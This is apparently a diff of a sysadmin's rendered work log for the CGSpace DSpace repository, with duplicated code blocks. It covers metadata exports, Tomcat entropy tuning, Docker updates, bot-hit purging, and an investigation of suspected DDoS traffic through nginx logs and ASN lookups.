<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value AS &#34;dcterms.subject&#34;, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id = 187 GROUP BY &#34;dcterms.subject&#34; ORDER BY count DESC) to /tmp/2021-06-30-agrovoc.csv WITH CSV HEADER;
COPY 20780
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value AS &#34;dcterms.subject&#34;, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id = 187 GROUP BY &#34;dcterms.subject&#34; ORDER BY count DESC) to /tmp/2021-06-30-agrovoc.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>COPY 20780
</span></span></code></pre></div><ul>
- Actually Enrico wanted non-AGROVOC subjects, so I extracted all the center and CRP subjects (ignoring system office and themes):
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242) GROUP BY subject ORDER BY count DESC) to /tmp/2021-06-30-non-agrovoc.csv WITH CSV HEADER;
COPY 1710
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242) GROUP BY subject ORDER BY count DESC) to /tmp/2021-06-30-non-agrovoc.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>COPY 1710
</span></span></code></pre></div><ul>
- Fix an issue in the Ansible infrastructure playbooks for the DSpace role
  - It was causing the template module to fail when setting up the npm environment
- I saw a strange message in the Tomcat 7 journal on DSpace Test (linode26):
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">Jun 30 16:00:09 linode26 tomcat7[30294]: WARNING: Creation of SecureRandom instance for session ID generation using [SHA1PRNG] took [111,733] milliseconds.
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>Jun 30 16:00:09 linode26 tomcat7[30294]: WARNING: Creation of SecureRandom instance for session ID generation using [SHA1PRNG] took [111,733] milliseconds.
</span></span></code></pre></div><ul>
- What's even crazier is that it is twice that on CGSpace (linode18)!
- Apparently OpenJDK defaults to using `/dev/random` (see `/etc/java-8-openjdk/security/java.security`), so I changed it to urandom:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">securerandom.source=file:/dev/urandom
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>securerandom.source=file:/dev/urandom
</span></span></code></pre></div><ul>
- `/dev/random` blocks and can take a long time to get entropy, and urandom on modern Linux is a cryptographically secure pseudorandom number generator
  - Now Tomcat starts much faster and no warning is printed, so I'm going to add this to our Ansible infrastructure playbooks (an equivalent JVM-flag approach is sketched below)
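- For reference, the same effect can be had without editing `java.security`, via the classic `java.security.egd` property; a sketch, assuming the Debian-style `/etc/default/tomcat7` is where this instance keeps its Tomcat options:

```console
# the extra "/./" works around the JVM special-casing of the plain file:/dev/urandom URL
$ echo 'JAVA_OPTS="$JAVA_OPTS -Djava.security.egd=file:/dev/./urandom"' | sudo tee -a /etc/default/tomcat7
```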

## 2021-07-01

- Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC, for Enrico:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
COPY 20994
</code></pre></div><h2 id="2021-07-04">2021-07-04</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>COPY 20994
</span></span></code></pre></div><h2 id="2021-07-04">2021-07-04</h2>
- Update all Docker containers on the AReS server (linode20) and rebuild OpenRXV:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cd OpenRXV
$ docker-compose -f docker/docker-compose.yml down
$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | xargs -L1 docker pull
$ docker-compose -f docker/docker-compose.yml build
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cd OpenRXV
</span></span><span style="display:flex;"><span>$ docker-compose -f docker/docker-compose.yml down
</span></span><span style="display:flex;"><span>$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | xargs -L1 docker pull
</span></span><span style="display:flex;"><span>$ docker-compose -f docker/docker-compose.yml build
</span></span></code></pre></div><ul>
- Then run all system updates and reboot the server
- After the server came back up I cloned the `openrxv-items-final` index to `openrxv-items-temp` and started the plugins (a sketch of the clone is below)
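- For reference, a sketch of cloning an index with the Elasticsearch clone API, assuming ES 7.4 or newer on the default port (the source index must be made read-only for the clone, then writable again):

```console
$ curl -s -X PUT 'localhost:9200/openrxv-items-final/_settings' -H 'Content-Type: application/json' -d '{"index.blocks.write": true}'
$ curl -s -X POST 'localhost:9200/openrxv-items-final/_clone/openrxv-items-temp'
$ curl -s -X PUT 'localhost:9200/openrxv-items-final/_settings' -H 'Content-Type: application/json' -d '{"index.blocks.write": false}'
```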
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-hits.sh -f /tmp/spiders -p
Purging 95 hits from Drupal in statistics
Purging 38 hits from DTS Agent in statistics
Purging 601 hits from Microsoft Office Existence Discovery in statistics
Purging 51 hits from Site24x7 in statistics
Purging 62 hits from Trello in statistics
Purging 13574 hits from WhatsApp in statistics
Purging 144 hits from FlipboardProxy in statistics
Purging 37 hits from LinkWalker in statistics
Purging 1 hits from [Ll]ink.?[Cc]heck.? in statistics
Purging 427 hits from WordPress in statistics
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 15030
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f /tmp/spiders -p
</span></span><span style="display:flex;"><span>Purging 95 hits from Drupal in statistics
</span></span><span style="display:flex;"><span>Purging 38 hits from DTS Agent in statistics
</span></span><span style="display:flex;"><span>Purging 601 hits from Microsoft Office Existence Discovery in statistics
</span></span><span style="display:flex;"><span>Purging 51 hits from Site24x7 in statistics
</span></span><span style="display:flex;"><span>Purging 62 hits from Trello in statistics
</span></span><span style="display:flex;"><span>Purging 13574 hits from WhatsApp in statistics
</span></span><span style="display:flex;"><span>Purging 144 hits from FlipboardProxy in statistics
</span></span><span style="display:flex;"><span>Purging 37 hits from LinkWalker in statistics
</span></span><span style="display:flex;"><span>Purging 1 hits from [Ll]ink.?[Cc]heck.? in statistics
</span></span><span style="display:flex;"><span>Purging 427 hits from WordPress in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 15030
</span></span></code></pre></div><ul>
- Meet with the CGIAR-AGROVOC task group to discuss how we want to do the workflow for submitting new terms to AGROVOC
- I extracted another list of all subjects to check against AGROVOC:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">\COPY (SELECT DISTINCT(LOWER(text_value)) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-06-all-subjects.csv WITH CSV HEADER;
$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-07-06-all-subjects.csv | sed 1d &gt; /tmp/2021-07-06-all-subjects.txt
$ ./ilri/agrovoc-lookup.py -i /tmp/2021-07-06-all-subjects.txt -o /tmp/2021-07-06-agrovoc-results-all-subjects.csv -d
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>\COPY (SELECT DISTINCT(LOWER(text_value)) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-06-all-subjects.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-07-06-all-subjects.csv | sed 1d &gt; /tmp/2021-07-06-all-subjects.txt
</span></span><span style="display:flex;"><span>$ ./ilri/agrovoc-lookup.py -i /tmp/2021-07-06-all-subjects.txt -o /tmp/2021-07-06-agrovoc-results-all-subjects.csv -d
</span></span></code></pre></div><ul>
- Test [Hrafn Malmquist's proposed DBCP2 changes](https://github.com/DSpace/DSpace/pull/3162) for DSpace 6.4 (DS-4574)
  - His changes reminded me that we can perhaps switch back to using this pooling instead of Tomcat 7's JDBC pooling via JNDI
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># <span style="color:#66d9ef">for</span> num in <span style="color:#f92672">{</span>10..26<span style="color:#f92672">}</span>; <span style="color:#66d9ef">do</span> echo <span style="color:#e6db74">&#34;2021-06-</span>$num<span style="color:#e6db74">&#34;</span>; zcat /var/log/nginx/access.log.*.gz /var/log/nginx/library-access.log.*.gz | grep <span style="color:#e6db74">&#34;</span>$num<span style="color:#e6db74">/Jun/2021&#34;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq | wc -l; <span style="color:#66d9ef">done</span>
2021-06-10
10693
2021-06-11
10587
2021-06-12
7958
2021-06-13
7681
2021-06-14
12639
2021-06-15
15388
2021-06-16
12245
2021-06-17
11187
2021-06-18
9684
2021-06-19
7835
2021-06-20
7198
2021-06-21
10380
2021-06-22
10255
2021-06-23
15878
2021-06-24
9963
2021-06-25
9439
2021-06-26
7930
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># <span style="color:#66d9ef">for</span> num in <span style="color:#f92672">{</span>10..26<span style="color:#f92672">}</span>; <span style="color:#66d9ef">do</span> echo <span style="color:#e6db74">&#34;2021-06-</span>$num<span style="color:#e6db74">&#34;</span>; zcat /var/log/nginx/access.log.*.gz /var/log/nginx/library-access.log.*.gz | grep <span style="color:#e6db74">&#34;</span>$num<span style="color:#e6db74">/Jun/2021&#34;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq | wc -l; <span style="color:#66d9ef">done</span>
</span></span><span style="display:flex;"><span>2021-06-10
</span></span><span style="display:flex;"><span>10693
</span></span><span style="display:flex;"><span>2021-06-11
</span></span><span style="display:flex;"><span>10587
</span></span><span style="display:flex;"><span>2021-06-12
</span></span><span style="display:flex;"><span>7958
</span></span><span style="display:flex;"><span>2021-06-13
</span></span><span style="display:flex;"><span>7681
</span></span><span style="display:flex;"><span>2021-06-14
</span></span><span style="display:flex;"><span>12639
</span></span><span style="display:flex;"><span>2021-06-15
</span></span><span style="display:flex;"><span>15388
</span></span><span style="display:flex;"><span>2021-06-16
</span></span><span style="display:flex;"><span>12245
</span></span><span style="display:flex;"><span>2021-06-17
</span></span><span style="display:flex;"><span>11187
</span></span><span style="display:flex;"><span>2021-06-18
</span></span><span style="display:flex;"><span>9684
</span></span><span style="display:flex;"><span>2021-06-19
</span></span><span style="display:flex;"><span>7835
</span></span><span style="display:flex;"><span>2021-06-20
</span></span><span style="display:flex;"><span>7198
</span></span><span style="display:flex;"><span>2021-06-21
</span></span><span style="display:flex;"><span>10380
</span></span><span style="display:flex;"><span>2021-06-22
</span></span><span style="display:flex;"><span>10255
</span></span><span style="display:flex;"><span>2021-06-23
</span></span><span style="display:flex;"><span>15878
</span></span><span style="display:flex;"><span>2021-06-24
</span></span><span style="display:flex;"><span>9963
</span></span><span style="display:flex;"><span>2021-06-25
</span></span><span style="display:flex;"><span>9439
</span></span><span style="display:flex;"><span>2021-06-26
</span></span><span style="display:flex;"><span>7930
</span></span></code></pre></div><ul>
- Similarly, the number of connections to the REST API was around the average for the recent weeks before:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># <span style="color:#66d9ef">for</span> num in <span style="color:#f92672">{</span>10..26<span style="color:#f92672">}</span>; <span style="color:#66d9ef">do</span> echo <span style="color:#e6db74">&#34;2021-06-</span>$num<span style="color:#e6db74">&#34;</span>; zcat /var/log/nginx/rest.*.gz | grep <span style="color:#e6db74">&#34;</span>$num<span style="color:#e6db74">/Jun/2021&#34;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq | wc -l; <span style="color:#66d9ef">done</span>
2021-06-10
1183
2021-06-11
1074
2021-06-12
911
2021-06-13
892
2021-06-14
1320
2021-06-15
1257
2021-06-16
1208
2021-06-17
1119
2021-06-18
965
2021-06-19
985
2021-06-20
854
2021-06-21
1098
2021-06-22
1028
2021-06-23
1375
2021-06-24
1135
2021-06-25
969
2021-06-26
904
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># <span style="color:#66d9ef">for</span> num in <span style="color:#f92672">{</span>10..26<span style="color:#f92672">}</span>; <span style="color:#66d9ef">do</span> echo <span style="color:#e6db74">&#34;2021-06-</span>$num<span style="color:#e6db74">&#34;</span>; zcat /var/log/nginx/rest.*.gz | grep <span style="color:#e6db74">&#34;</span>$num<span style="color:#e6db74">/Jun/2021&#34;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq | wc -l; <span style="color:#66d9ef">done</span>
</span></span><span style="display:flex;"><span>2021-06-10
</span></span><span style="display:flex;"><span>1183
</span></span><span style="display:flex;"><span>2021-06-11
</span></span><span style="display:flex;"><span>1074
</span></span><span style="display:flex;"><span>2021-06-12
</span></span><span style="display:flex;"><span>911
</span></span><span style="display:flex;"><span>2021-06-13
</span></span><span style="display:flex;"><span>892
</span></span><span style="display:flex;"><span>2021-06-14
</span></span><span style="display:flex;"><span>1320
</span></span><span style="display:flex;"><span>2021-06-15
</span></span><span style="display:flex;"><span>1257
</span></span><span style="display:flex;"><span>2021-06-16
</span></span><span style="display:flex;"><span>1208
</span></span><span style="display:flex;"><span>2021-06-17
</span></span><span style="display:flex;"><span>1119
</span></span><span style="display:flex;"><span>2021-06-18
</span></span><span style="display:flex;"><span>965
</span></span><span style="display:flex;"><span>2021-06-19
</span></span><span style="display:flex;"><span>985
</span></span><span style="display:flex;"><span>2021-06-20
</span></span><span style="display:flex;"><span>854
</span></span><span style="display:flex;"><span>2021-06-21
</span></span><span style="display:flex;"><span>1098
</span></span><span style="display:flex;"><span>2021-06-22
</span></span><span style="display:flex;"><span>1028
</span></span><span style="display:flex;"><span>2021-06-23
</span></span><span style="display:flex;"><span>1375
</span></span><span style="display:flex;"><span>2021-06-24
</span></span><span style="display:flex;"><span>1135
</span></span><span style="display:flex;"><span>2021-06-25
</span></span><span style="display:flex;"><span>969
</span></span><span style="display:flex;"><span>2021-06-26
</span></span><span style="display:flex;"><span>904
</span></span></code></pre></div><ul>
- According to goaccess, the traffic spike started at 2AM (remember that the first "Pool empty" error in dspace.log was at 4:01AM):
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># zcat /var/log/nginx/access.log.1<span style="color:#f92672">[</span>45<span style="color:#f92672">]</span>.gz /var/log/nginx/library-access.log.1<span style="color:#f92672">[</span>45<span style="color:#f92672">]</span>.gz | grep -E <span style="color:#e6db74">&#39;23/Jun/2021&#39;</span> | goaccess --log-format<span style="color:#f92672">=</span>COMBINED -
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># zcat /var/log/nginx/access.log.1<span style="color:#f92672">[</span>45<span style="color:#f92672">]</span>.gz /var/log/nginx/library-access.log.1<span style="color:#f92672">[</span>45<span style="color:#f92672">]</span>.gz | grep -E <span style="color:#e6db74">&#39;23/Jun/2021&#39;</span> | goaccess --log-format<span style="color:#f92672">=</span>COMBINED -
</span></span></code></pre></div><ul>
- Moayad sent a fix for the add missing items plugin issue ([#107](https://github.com/ilri/OpenRXV/pull/107))
  - It works MUCH faster because it correctly identifies the missing handles in each repository
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">postgres@linode18:~$ psql -c &#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39; | wc -l
2302
postgres@linode18:~$ psql -c &#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39; | wc -l
2564
postgres@linode18:~$ psql -c &#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39; | wc -l
2530
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>postgres@linode18:~$ psql -c &#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39; | wc -l
</span></span><span style="display:flex;"><span>2302
</span></span><span style="display:flex;"><span>postgres@linode18:~$ psql -c &#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39; | wc -l
</span></span><span style="display:flex;"><span>2564
</span></span><span style="display:flex;"><span>postgres@linode18:~$ psql -c &#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39; | wc -l
</span></span><span style="display:flex;"><span>2530
</span></span></code></pre></div><ul>
<li>The locks are held by XMLUI, not REST API or OAI:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">postgres@linode18:~$ psql -c &#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi)&#39; | sort | uniq -c | sort -n
57 dspaceApi
2671 dspaceWeb
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>postgres@linode18:~$ psql -c &#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi)&#39; | sort | uniq -c | sort -n
</span></span><span style="display:flex;"><span> 57 dspaceApi
</span></span><span style="display:flex;"><span> 2671 dspaceWeb
</span></span></code></pre></div><ul>
<li>I ran all updates on the server (linode18) and restarted it, then DSpace came back up</li>
<li>I sent a message to Atmire, as I never heard from them last week when we blocked access to the REST API for two days for them to investigate the server issues</li>
<li>Clone the <code>openrxv-items-temp</code> index on AReS and re-run all the plugins, but most of the &ldquo;dspace_add_missing_items&rdquo; tasks failed so I will just run a full re-harvest</li>
@@ -338,31 +338,31 @@ postgres@linode18:~$ psql -c &#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_ac
</ul>
</li>
</ul>
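<ul>
<li>For reference, a minimal sketch of how such an Elasticsearch index clone can be done with curl (the backup index name and host are assumptions, not what AReS does internally):
<pre tabindex="0"><code class="language-console" data-lang="console">$ curl -X PUT &#39;localhost:9200/openrxv-items-temp/_settings&#39; -H &#39;Content-Type: application/json&#39; -d &#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;
$ curl -X POST &#39;localhost:9200/openrxv-items-temp/_clone/openrxv-items-backup&#39;
$ curl -X PUT &#39;localhost:9200/openrxv-items-temp/_settings&#39; -H &#39;Content-Type: application/json&#39; -d &#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;
</code></pre>
</li>
</ul>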
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># grepcidr 91.243.191.0/24 /var/log/nginx/access.log | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq -c | sort -n
32 91.243.191.124
33 91.243.191.129
33 91.243.191.200
34 91.243.191.115
34 91.243.191.154
34 91.243.191.234
34 91.243.191.56
35 91.243.191.187
35 91.243.191.91
36 91.243.191.58
37 91.243.191.209
39 91.243.191.119
39 91.243.191.144
39 91.243.191.55
40 91.243.191.112
40 91.243.191.182
40 91.243.191.57
40 91.243.191.98
41 91.243.191.106
44 91.243.191.79
45 91.243.191.151
46 91.243.191.103
56 91.243.191.172
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># grepcidr 91.243.191.0/24 /var/log/nginx/access.log | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq -c | sort -n
</span></span><span style="display:flex;"><span> 32 91.243.191.124
</span></span><span style="display:flex;"><span> 33 91.243.191.129
</span></span><span style="display:flex;"><span> 33 91.243.191.200
</span></span><span style="display:flex;"><span> 34 91.243.191.115
</span></span><span style="display:flex;"><span> 34 91.243.191.154
</span></span><span style="display:flex;"><span> 34 91.243.191.234
</span></span><span style="display:flex;"><span> 34 91.243.191.56
</span></span><span style="display:flex;"><span> 35 91.243.191.187
</span></span><span style="display:flex;"><span> 35 91.243.191.91
</span></span><span style="display:flex;"><span> 36 91.243.191.58
</span></span><span style="display:flex;"><span> 37 91.243.191.209
</span></span><span style="display:flex;"><span> 39 91.243.191.119
</span></span><span style="display:flex;"><span> 39 91.243.191.144
</span></span><span style="display:flex;"><span> 39 91.243.191.55
</span></span><span style="display:flex;"><span> 40 91.243.191.112
</span></span><span style="display:flex;"><span> 40 91.243.191.182
</span></span><span style="display:flex;"><span> 40 91.243.191.57
</span></span><span style="display:flex;"><span> 40 91.243.191.98
</span></span><span style="display:flex;"><span> 41 91.243.191.106
</span></span><span style="display:flex;"><span> 44 91.243.191.79
</span></span><span style="display:flex;"><span> 45 91.243.191.151
</span></span><span style="display:flex;"><span> 46 91.243.191.103
</span></span><span style="display:flex;"><span> 56 91.243.191.172
</span></span></code></pre></div><ul>
<li>I found a few people complaining about these Russian attacks too:
<ul>
<li><a href="https://community.cloudflare.com/t/russian-ddos-completley-unmitigated-by-cloudflare/284578">https://community.cloudflare.com/t/russian-ddos-completley-unmitigated-by-cloudflare/284578</a></li>
@@ -392,22 +392,22 @@ postgres@linode18:~$ psql -c &#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_ac
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./asn -n 45.80.217.235
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>╭──────────────────────────────╮
│ ASN lookup for 45.80.217.235 │
╰──────────────────────────────╯
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span> 45.80.217.235 ┌PTR -
├ASN 46844 (ST-BGP, US)
├ORG Sharktech
├NET 45.80.217.0/24 (TrafficTransitSolutionNet)
├ABU info@traffictransitsolution.us
├ROA ✓ VALID (1 ROA found)
├TYP Proxy host Hosting/DC
├GEO Los Angeles, California (US)
└REP ✓ NONE
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./asn -n 45.80.217.235
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>╭──────────────────────────────╮
</span></span><span style="display:flex;"><span>│ ASN lookup for 45.80.217.235 │
</span></span><span style="display:flex;"><span>╰──────────────────────────────╯
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span> 45.80.217.235 ┌PTR -
</span></span><span style="display:flex;"><span> ├ASN 46844 (ST-BGP, US)
</span></span><span style="display:flex;"><span> ├ORG Sharktech
</span></span><span style="display:flex;"><span> ├NET 45.80.217.0/24 (TrafficTransitSolutionNet)
</span></span><span style="display:flex;"><span> ├ABU info@traffictransitsolution.us
</span></span><span style="display:flex;"><span> ├ROA ✓ VALID (1 ROA found)
</span></span><span style="display:flex;"><span> ├TYP Proxy host Hosting/DC
</span></span><span style="display:flex;"><span> ├GEO Los Angeles, California (US)
</span></span><span style="display:flex;"><span> └REP ✓ NONE
</span></span></code></pre></div><ul>
<li>Slowly slowly I manually built up a list of the IPs, ISP names, and network blocks, for example:</li>
</ul>
<pre tabindex="0"><code class="language-csv" data-lang="csv">IP, Organization, Website, Network
@@ -496,56 +496,56 @@ postgres@linode18:~$ psql -c &#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_ac
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># grep -v -E <span style="color:#e6db74">&#34;(mahider|Googlebot|Turnitin|Grammarly|Unpaywall|UptimeRobot|bot)&#34;</span> /var/log/nginx/access.log | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq &gt; /tmp/ips-sorted.txt
# wc -l /tmp/ips-sorted.txt
10776 /tmp/ips-sorted.txt
</code></pre></div><ul>
